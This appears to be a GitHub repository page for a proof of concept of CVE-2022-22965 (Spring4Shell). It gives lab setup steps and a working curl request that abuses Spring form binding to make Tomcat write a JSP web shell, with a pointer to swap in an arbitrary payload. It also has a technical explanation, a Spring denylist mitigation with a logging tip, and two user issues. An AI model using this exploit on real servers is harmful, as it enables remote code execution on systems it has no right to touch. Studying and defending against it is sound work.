
cve-2022-22965-poc's Introduction

CVE-2022-22965 PoC

Minimal example of how to reproduce CVE-2022-22965 Spring RCE.

Run using docker compose

  1. Build the application using Docker compose
    docker-compose up --build
  2. To test the app, browse to http://localhost:8080/handling-form-submission-complete/greeting
  3. Run the exploit
    ./exploits/run.sh
  4. The exploit is going to create an rce.jsp file in webapps/handling-form-submission-complete on the web server.
  5. Use the exploit: browse to http://localhost:8080/handling-form-submission-complete/rce.jsp

Alternative way (debug oriented)

  1. Run the Tomcat server in docker

    docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0

    Add -p 5005:5005 -e "JAVA_OPTS=-Xdebug -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005" if you want to debug remotely.

  2. Build the project

    ./mvnw install
  3. Deploy the app

    docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
  4. Write the exploit

    curl -X POST \
      -H "pre:<%" \
      -H "post:;%>" \
      -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
      -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
      -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
      -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
      -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
      http://localhost:8888/handling-form-submission-complete/greeting

    The exploit is going to create an rce.jsp file in webapps/handling-form-submission-complete on the web server.

  5. Use the exploit

    curl http://localhost:8888/handling-form-submission-complete/rce.jsp

    Now you'll see 123 in the container's terminal. Replace System.out.println(123) with your payload to execute arbitrary code.

Short technical explanation

  1. Spring knows how to bind form fields to Java objects. In our example GreetingController handles POST requests on the /greeting endpoint and binds form fields to the Greeting object.
  2. It also supports binding of nested fields (e.g. user.info.firstname). See AbstractNestablePropertyAccessor for reference.
  3. In our example the Greeting class has two fields, id and content, but it also has a reference to its Class object. We can use class.module.classLoader as a form data key to access the classloader.
  4. In the fix we can see that the main change was to restrict access to most of the Class object properties, including the module one.
  5. This behaviour allows us to set public properties of classes reachable via a nested reference chain from the Greeting class. Nothing else. In most cases it is not even dangerous because no classes with public fields are reachable, even from class.module.classLoader.
  6. It becomes a problem on the Tomcat server because the classloader there has a getResources accessor, which allows us to continue the reference chain and reach one of the instances of the AccessLogValve class.
  7. This class is meant to write logs. We change some of its properties to make it write a file with the name and content of our choice. We have an arbitrary file write at this point.
  8. We create a JSP file in the root of the application folder with the malicious payload. Since JSPs are executed automatically by Tomcat, we can navigate to it in the browser and execute the payload. Now it is RCE.
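The Spring-side mitigation for this binding chain, as an added example that is not part of the PoC repository: the @ControllerAdvice denylist that Spring's advisory recommended as a workaround for applications that could not upgrade, plus a stand-alone DataBinder check showing the nested chain being suppressed before it ever reaches the property accessor. The Greeting class here is a constructed stand-in for the page's form bean, and spring-webmvc 5.3.x is assumed on the classpath.

```java
// Added example (not part of the PoC repository): Spring's recommended
// @ControllerAdvice denylist workaround, plus a stand-alone DataBinder check.
// Assumes spring-webmvc 5.3.x on the classpath; Greeting is a constructed
// stand-in for the page's form bean.
import org.springframework.beans.MutablePropertyValues;
import org.springframework.core.annotation.Order;
import org.springframework.validation.DataBinder;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

@ControllerAdvice
@Order(10000) // high order value: applied late among @ControllerAdvice beans
public class BinderControllerAdvice {
    // Both capitalisations are listed because disallowed-field matching was
    // case-sensitive in the affected 5.3.x releases; the "*." variants cover
    // the chain when it starts from a nested bean rather than the root object.
    static final String[] DENYLIST = {"class.*", "Class.*", "*.class.*", "*.Class.*"};

    @InitBinder
    public void setDisallowedFields(WebDataBinder dataBinder) {
        dataBinder.setDisallowedFields(DENYLIST);
    }

    // Constructed stand-in for the page's Greeting form object.
    public static class Greeting {
        private long id;
        private String content;
        public long getId() { return id; }
        public void setId(long id) { this.id = id; }
        public String getContent() { return content; }
        public void setContent(String content) { this.content = content; }
    }

    // Stand-alone check outside a web request: bind a legitimate field together
    // with the nested chain from the PoC and report which one was suppressed.
    public static void main(String[] args) {
        Greeting target = new Greeting();
        DataBinder binder = new DataBinder(target, "greeting");
        binder.setDisallowedFields(DENYLIST);

        MutablePropertyValues pvs = new MutablePropertyValues();
        pvs.add("content", "hello");
        pvs.add("class.module.classLoader.resources.context.parent.pipeline.first.suffix", ".jsp");
        binder.bind(pvs);

        System.out.println("content    = " + target.getContent());
        System.out.println("suppressed = " + String.join(", ", binder.getBindingResult().getSuppressedFields()));
    }
}
```

The suppressed field list is also what you would log or alert on in production: any request that trips the denylist is a binding attempt that legitimate form traffic never produces.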

Conditions

The exploit works only on Tomcat because it has a special classloader. A similar reference chain may exist on other web application servers as well; it simply has not been discovered yet.

The exploit requires Java 9 or above because the module property was added in Java 9.

cve-2022-22965-poc's Issues

NullValueInNestedPathException when following steps in README

When I follow the steps outlined in the README I run into an exception when issuing the call to /greeting and the following stacktrace is emitted:

2022-04-04 14:20:11.624 ERROR 1 --- [nio-8080-exec-3] o.s.b.w.servlet.support.ErrorPageFilter  : Forwarding to error page from request [/greeting] due to exception [Invalid property 'class.module.classLoader.resources' of bean class [java.lang.Module]: Could not instantiate property type [org.apache.catalina.WebResourceRoot] to auto-grow nested property path; nested exception is java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()]

org.springframework.beans.NullValueInNestedPathException: Invalid property 'class.module.classLoader.resources' of bean class [java.lang.Module]: Could not instantiate property type [org.apache.catalina.WebResourceRoot] to auto-grow nested property path; nested exception is java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()
	at org.springframework.beans.AbstractNestablePropertyAccessor.newValue(AbstractNestablePropertyAccessor.java:923) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.createDefaultPropertyValue(AbstractNestablePropertyAccessor.java:887) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.setDefaultValue(AbstractNestablePropertyAccessor.java:874) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getNestedPropertyAccessor(AbstractNestablePropertyAccessor.java:846) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:820) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:821) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:821) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:821) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractNestablePropertyAccessor.setPropertyValue(AbstractNestablePropertyAccessor.java:256) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.beans.AbstractPropertyAccessor.setPropertyValues(AbstractPropertyAccessor.java:104) ~[spring-beans-5.3.17.jar:5.3.17]
	at org.springframework.validation.DataBinder.applyPropertyValues(DataBinder.java:856) ~[spring-context-5.3.15.jar:5.3.15]
	at org.springframework.validation.DataBinder.doBind(DataBinder.java:751) ~[spring-context-5.3.15.jar:5.3.15]
	at org.springframework.web.bind.WebDataBinder.doBind(WebDataBinder.java:198) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.bind.ServletRequestDataBinder.bind(ServletRequestDataBinder.java:118) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.annotation.ServletModelAttributeMethodProcessor.bindRequestParameters(ServletModelAttributeMethodProcessor.java:158) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.method.annotation.ModelAttributeMethodProcessor.resolveArgument(ModelAttributeMethodProcessor.java:171) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:122) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:179) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:146) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:117) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:895) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:808) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:87) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:1067) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:963) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:1006) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:909) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:681) ~[servlet-api.jar:4.0.FR]
	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:883) ~[spring-webmvc-5.3.15.jar:5.3.15]
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:764) ~[servlet-api.jar:4.0.FR]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53) ~[tomcat-websocket.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117) ~[spring-web-5.3.15.jar:5.3.15]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117) ~[spring-web-5.3.15.jar:5.3.15]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.springframework.boot.web.servlet.support.ErrorPageFilter.doFilter(ErrorPageFilter.java:126) ~[spring-boot-2.6.3.jar:2.6.3]
	at org.springframework.boot.web.servlet.support.ErrorPageFilter.access$000(ErrorPageFilter.java:64) ~[spring-boot-2.6.3.jar:2.6.3]
	at org.springframework.boot.web.servlet.support.ErrorPageFilter$1.doFilterInternal(ErrorPageFilter.java:101) ~[spring-boot-2.6.3.jar:2.6.3]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.boot.web.servlet.support.ErrorPageFilter.doFilter(ErrorPageFilter.java:119) ~[spring-boot-2.6.3.jar:2.6.3]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201) ~[spring-web-5.3.15.jar:5.3.15]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:117) ~[spring-web-5.3.15.jar:5.3.15]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:197) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97) ~[catalina.jar:9.0.62]
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:135) ~[catalina.jar:9.0.62]
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92) ~[catalina.jar:9.0.62]
	at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:687) ~[catalina.jar:9.0.62]
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78) ~[catalina.jar:9.0.62]
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:360) ~[catalina.jar:9.0.62]
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:399) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:890) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1743) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) ~[tomcat-coyote.jar:9.0.62]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-util.jar:9.0.62]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-util.jar:9.0.62]
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-util.jar:9.0.62]
	at java.base/java.lang.Thread.run(Thread.java:829) ~[na:na]
Caused by: java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()
	at java.base/java.lang.Class.getConstructor0(Class.java:3349) ~[na:na]
	at java.base/java.lang.Class.getDeclaredConstructor(Class.java:2553) ~[na:na]
	at org.springframework.beans.AbstractNestablePropertyAccessor.newValue(AbstractNestablePropertyAccessor.java:914) ~[spring-beans-5.3.17.jar:5.3.17]
	... 70 common frames omitted

Any ideas what I need to do to get the curl to complete?

Include LICENSE file

Could you please attach a license file, for example MIT, Apache 2.0, GPL. A license file would make clear what I am allowed to do with this code and what not.
About the background: I am a student at the University of Ulm and am currently writing my master thesis.
For my empirical study I am investigating vulnerable projects and evaluating different security tools.
I would like to choose your project as one of my test cases for my empirical study.
However, since there is no license file available, I am not sure if I am allowed to use this code for my empirical study or not.
Thank you! :)
